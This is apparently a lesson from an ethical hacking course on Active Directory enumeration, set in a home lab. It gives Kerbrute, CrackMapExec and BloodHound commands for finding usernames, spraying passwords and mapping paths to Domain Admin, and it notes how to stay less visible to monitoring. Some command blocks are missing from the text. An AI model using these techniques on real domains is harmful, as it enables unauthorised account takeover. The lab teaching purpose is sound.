⚠️ Isolated Lab Environment Only: All Active Directory attack techniques in this guide must only be practised in your own isolated home lab built on Day 23. Never run enumeration or attack tools against any production AD environment without explicit written authorisation from the domain owner. Unauthorised testing violates the Computer Misuse Act, CFAA, and equivalent laws globally. All exercises target your lab.local domain controller only.
Yesterday we built the foundation — understanding the AD structure, Kerberos flow, and setting up the lab. Today we start attacking. Active Directory attacks begin not with exploits but with enumeration: finding every user, every group, every misconfigured permission, and every attack path before touching anything. The tools on Day 24 — Kerbrute, CrackMapExec, BloodHound — are what professional red teamers use to map the entire domain from a single low-privileged foothold. By the end of today you will have your first active directory attacks methodology working in your lab.
🎯 What You’ll Master in Day 24
Enumerate domain users without credentials using Kerbrute Kerberos username enumeration
Query the password policy to plan a safe spray that stays below lockout thresholds
Execute a controlled password spray using CrackMapExec and Kerbrute
Run BloodHound/bloodhound-python to map the full attack path to Domain Admin
Identify the shortest path from your foothold to DA and prioritise next steps
⏱️ 28 min read · 3 hands-on exercises
📊 Have you completed Day 23’s AD lab setup?
✅ This guide works for all levels. If you haven’t set up the lab yet, complete Day 23 first — all exercises require the lab.local domain controller.
📋 What You’ll Master in Day 24 — Active Directory Attacks
This is Day 24 of the 100-Day Free Ethical Hacking Course. The next five days build directly on today’s enumeration work — Day 25 uses the usernames and SPN data gathered today for Kerberoasting and AS-REP Roasting attacks.
The AD Attack Methodology — Enumerate Before You Exploit
Professional AD penetration testing follows a strict methodology: never exploit before you enumerate. This is not caution — it is efficiency. Blind exploitation wastes time and risks lockouts. Thorough enumeration tells you exactly which user to spray, which service account to Kerberoast, and which path to Domain Admin is fastest. The five-step AD attack chain from Day 23 maps directly to the tools we cover today.
DCSync · Golden Ticket · Persistence via krbtgt hash
📍 Today we cover steps 1–3. Days 25–27 cover steps 4–5.
📸 AD attack phase map for Days 24–31 — today covers unauthenticated enumeration through authenticated BloodHound mapping. Each phase feeds directly into the next.
🧠 EXERCISE 1 — THINK LIKE A HACKER (2 MIN)
Why is enumerating the password policy the most critical first step before spraying?
⏱️ Time: 2 minutes · No tools required
Consider this scenario: you have a list of 200 domain usernames. You want to spray the password “Password123!” against all of them. Before running a single command, answer these questions:
Domain policy (unknown to you): lockoutThreshold=3, observationWindow=30min
If you spray 200 users × 3 wrong passwords = all 200 accounts locked out.
Questions to answer before spraying:
1. What command gives you the lockout threshold safely?
2. How many passwords can you safely spray in one window?
3. What do you do if the policy shows lockoutThreshold=0 (no lockout)?
4. How long do you wait between spray rounds?
5. What happens to the organisation if you lock out 200 accounts?
✅ What you just learned: Password spraying without checking the policy first is one of the most destructive mistakes a penetration tester can make. Locking out hundreds of accounts causes immediate operational disruption, alerts the blue team, and invalidates the engagement. Policy-first spraying is a professional discipline, not optional caution. No spray without policy check.
📸 Write your answers to all 5 questions and share in #day24-methodology on Discord.
Kerbrute — Username Enumeration Without Triggering Lockouts
Kerbrute is a Go-based tool that uses the Kerberos pre-authentication mechanism to test whether usernames exist in a domain — without requiring any credentials and, crucially, without generating failed login events in Windows Security Event logs. This makes it the preferred tool for username enumeration during the unauthenticated phase of an AD assessment.
The technique works because of a subtle difference in how the Kerberos KDC responds to AS-REQ messages for valid versus invalid usernames. For a valid username, the KDC responds with a TGT or a request for pre-authentication credentials. For an invalid username, it responds with PRINCIPAL_UNKNOWN — a different error code. Kerbrute reads these responses and maps them to valid/invalid without ever providing a password.
# -o saves only valid users to file for use in next phases
💡 Why Kerbrute Over Other Methods: Traditional username enumeration via SMB or LDAP creates Windows Security Event ID 4625 (failed logon) for each attempt. Kerbrute’s Kerberos method typically does not generate these events, making enumeration significantly less visible to a monitoring SOC. Some modern AD configurations do log Kerberos pre-auth failures (Event ID 4771), so always verify with your client whether SIEM monitoring is active.
🧠 QUICK CHECK — Section 2
Why does Kerbrute username enumeration avoid triggering standard failed-login alerts?
Password Policy — The Information That Keeps Your Spray Safe
Before running a single password against a domain account, you must know the lockout policy. This is non-negotiable. The three values you need are: lockout threshold (number of failed attempts before lockout), lockout duration (how long the account stays locked), and observation window (the time window in which failed attempts are counted).
QUERY PASSWORD POLICY — MULTIPLE METHODS
# METHOD 1 — CrackMapExec (anonymous or with credentials)
lockoutThreshold = 5→ max 3 spray rounds (lockout – 2)
lockoutThreshold = 0→ NO lockout — spray freely but note detection risk
observationWindow = 30min→ wait 30 min between spray rounds
lockoutDuration = 30min→ accounts auto-unlock after 30 min
Password Spraying — One Password, Many Targets
Password spraying tests a single common password against all discovered usernames simultaneously. It is effective because organisations consistently have users who choose predictable passwords — seasonal passwords, company name + year combinations, or the organisation’s default password. The art is choosing the right password to spray and executing within the safe threshold.
# Only use this loop if lockoutThreshold=0 (no lockout) in your lab
⚠️ Critical Rule — Never Exceed Threshold – 2: If lockoutThreshold = 5, spray a maximum of 3 different passwords before waiting the full observation window. Going to 4 or 5 failures risks locking accounts if any prior failed attempts exist in the window. In your lab, set a zero-lockout policy during training so you can practise freely without consequences.
BloodHound — Mapping the Path to Domain Admin
BloodHound is a graphical attack path analysis tool that transforms raw Active Directory data into a map showing exactly which paths lead from your current access to Domain Admin. Once you have one set of valid credentials — even from a low-privileged user — BloodHound can identify the fastest attack path through ACL relationships, group memberships, and session data that would take days to find manually.
🧪 EXERCISE 2 — FREE ONLINE LAB (TryHackMe)
Complete the TryHackMe BloodHound room to practise attack path analysis
If you are waiting for your AD lab to be fully configured, use TryHackMe’s free BloodHound room to practice attack path analysis with a pre-built AD environment.
Target: tryhackme.com/room/bloodhound
Steps:
1. Deploy the room machine and connect via TryHackMe OpenVPN
2. Follow the room tasks to run SharpHound and collect AD data
3. Import the JSON files into BloodHound
4. Run the pre-built query: “Find Shortest Paths to Domain Admins”
5. Identify the attack path shown in the graph
6. Answer: what intermediate objects appear in the path?
✅ What you just learned: BloodHound makes complex AD attack paths instantly visible. A path that would require days of manual LDAP querying to discover appears as a clickable graph in seconds. The pre-built queries — especially “Find Shortest Paths to Domain Admins” — are what professional red teamers run within the first ten minutes of getting a foothold on a domain.
📸 Screenshot your BloodHound graph showing the attack path and share in #day24-bloodhound on Discord.
BLOODHOUND — DATA COLLECTION AND ANALYSIS
# Install bloodhound-python (Kali Linux)
sudo apt install bloodhound python3-bloodhound -y
pip3 install bloodhound –break-system-packages
# Collect AD data using bloodhound-python (from Kali, no Windows agent needed)
bloodhound-python \
-d lab.local \
-u asmith \
-p ‘Password123!’ \
-dc dc01.lab.local \
-c All \
–zip
# Creates: 20260406_BloodHound.zip with JSON files
# Start Neo4j database and BloodHound GUI
sudo neo4j start
bloodhound &
# Login: neo4j / neo4j (change on first login)
# Upload: drag and drop the .zip file into BloodHound
# KEY BLOODHOUND QUERIES TO RUN:
Find Shortest Paths to Domain Admins
Find All Domain Admins
List All Kerberoastable Accounts
Find Principals with DCSync Rights
Find Computers Where Domain Users are Local Admin
CrackMapExec — Swiss Army Knife for AD Enumeration
CrackMapExec (CME) is the single most versatile tool for authenticated AD enumeration. Once you have one valid credential — even from a low-privileged domain user — CME can enumerate users, groups, shares, logged-in sessions, and local administrator access across every machine in the domain simultaneously. Think of it as “what can I reach with this credential right now?”
CRACKMAPEXEC — AUTHENTICATED ENUMERATION COMMANDS
# Verify credentials and check for local admin (Pwn3d!)
Full enumeration sequence — from username discovery to BloodHound collection
⏱️ Time: 25 minutes · Target: Your lab.local DC at 192.168.56.10
Run the complete Day 24 enumeration workflow from scratch. By the end you will have a user list, password policy, a valid credential from the spray, and BloodHound data imported and ready.
# Start BloodHound, import zip, run “Find Shortest Paths to Domain Admins”
✅ What you just learned: In five steps you went from zero domain knowledge to a complete BloodHound attack map ready for Days 25–27. This is the exact workflow used on the first day of a real AD penetration test. The path BloodHound shows you is what you will exploit over the next four days — Kerberoasting, Pass the Hash, and lateral movement.
📸 Screenshot your BloodHound “Shortest Paths to Domain Admins” graph and share in #day24-exercise on Discord. Tag #adattacks2026
🧠 QUICK CHECK — Day 24 Final
What is the primary value of BloodHound over manual LDAP queries for AD attack path discovery?
📋 Commands Used Today — Day 24 Reference
kerbrute userenum –dc DC -d DOMAIN users.txtEnumerate valid AD usernames via Kerberos
kerbrute passwordspray -d DOMAIN –dc DC users.txt ‘Password’Spray one password against all users
crackmapexec smb DC -u USER -p PASS –usersEnumerate all domain users with valid credential
crackmapexec smb SUBNET -u USER -p PASS –sessionsFind where privileged users are logged in
bloodhound-python -d DOMAIN -u USER -p PASS -dc DC -c All –zipCollect all AD data for BloodHound analysis
🏆 Mark Day 24 as Complete
Enumeration complete — attack path mapped. Day 25 exploits it.
❓ Frequently Asked Questions
What is password spraying in Active Directory?
Password spraying tests a single common password against many user accounts, avoiding lockout by keeping each account’s failed attempt count to one. It works because organisations consistently have users with predictable passwords. Always query the password policy first to determine the safe spray threshold before executing.
What is BloodHound used for in AD attacks?
BloodHound collects Active Directory relationship data (users, groups, ACLs, sessions, trust relationships) using SharpHound or bloodhound-python, then visualises attack paths from any starting point to Domain Admin. It answers the critical question: given this foothold, what is the fastest path to DA?
What is Kerbrute and why use it over other enumeration tools?
Kerbrute enumerates valid domain usernames via Kerberos pre-authentication without providing passwords and typically without generating Windows Security Event 4625 (failed login) entries. This makes it significantly less visible to a monitoring SOC than SMB-based username enumeration methods.
How many passwords can I safely spray?
Always query the policy first. Spray a maximum of lockoutThreshold – 2 different passwords within one observation window. If threshold=5, spray max 3. Wait the full observation window between rounds. In your lab environment, set lockoutThreshold=0 to practise without consequences — but understand that on real engagements, locking out accounts causes operational disruption.
What comes after Day 24 in the AD attack series?
Day 25 covers Kerberos attacks — AS-REP Roasting (finding accounts without pre-auth required, requestable without credentials) and Kerberoasting (requesting service tickets for SPN accounts, cracking them offline). Both attacks use the user data and SPN enumeration from today’s BloodHound collection.
← Previous
Day 23: Active Directory Basics
Next →
Day 25: Kerberos Attacks — AS-REP & Kerberoasting
📚 Further Reading
Day 23: Active Directory Basics— The prerequisite — AD forest structure, Kerberos flow, and lab setup that all of today’s techniques build directly upon.
Ethical Hacking: Enumeration Hub— The complete enumeration category covering LDAP, SMB, Kerberos, RPC, and DNS enumeration techniques used across AD and non-AD environments.
Ethical Hacking: Exploitation Hub— Where the data gathered today leads — exploitation techniques including Kerberoasting, Pass the Hash, and lateral movement covered in Days 25–30.
MITRE ATT&CK: Password Spraying (T1110.003)— MITRE’s complete technical reference for password spraying — detection methods, mitigations, and real-world threat actor usage patterns.
BloodHound Official Documentation— Complete reference for BloodHound queries, data collection methods, custom query writing, and attack path interpretation.
ME
Mr Elite
Owner, SecurityElites.com
The first time I ran BloodHound on a real corporate AD environment, I found a path from the helpdesk account I had compromised to Domain Admin in four hops — via an obscure ACL relationship that the client’s IT team had no idea existed. It had been in place for three years. That experience changed how I think about AD security fundamentally: complexity is the enemy of security, and BloodHound makes the invisible visible. Teaching Day 24 properly — the enumeration-first discipline — is the foundation that makes everything from Day 25 onwards possible without unnecessary noise or collateral damage.
Leave a Reply